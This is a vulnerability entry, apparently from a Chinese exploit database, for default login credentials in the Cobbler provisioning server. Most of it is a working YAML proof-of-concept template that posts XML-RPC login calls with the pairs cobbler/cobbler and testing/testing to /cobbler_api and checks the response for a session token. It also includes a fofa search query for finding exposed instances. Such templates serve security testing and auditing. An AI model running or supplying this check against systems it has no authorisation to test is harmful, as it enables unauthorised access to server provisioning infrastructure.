漏洞描述
Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler"
cobbler-default-login: Cobbler Default Login
PoC代码[已公开]
id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
severity: high
verified: true
description: Cobbler default login credentials for the testing module (testing/testing) were discovered. fofa "Cobbler"
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
- https://github.com/cobbler/cobbler/issues/2909
rules:
r0:
request:
method: POST
path: /cobbler_api
headers:
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
body: |
<?xml version='1.0'?>
<methodCall>
<methodName>login</methodName>
<params>
<param>
<value>
<string>cobbler</string>
</value>
</param>
<param>
<value>
<string>cobbler</string>
</value>
</param>
</params>
</methodCall>
expression: response.status == 200 && "(.*[a-zA-Z0-9].+==)</string></value>".bmatches(response.body) && response.raw_header.bcontains(b'text/xml')
r1:
request:
method: POST
path: /cobbler_api
headers:
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
body: |
<?xml version='1.0'?>
<methodCall>
<methodName>login</methodName>
<params>
<param>
<value>
<string>testing</string>
</value>
</param>
<param>
<value>
<string>testing</string>
</value>
</param>
</params>
</methodCall>
expression: response.status == 200 && "(.*[a-zA-Z0-9].+==)</string></value>".bmatches(response.body) && response.raw_header.bcontains(b'text/xml')
expression: r0() || r1()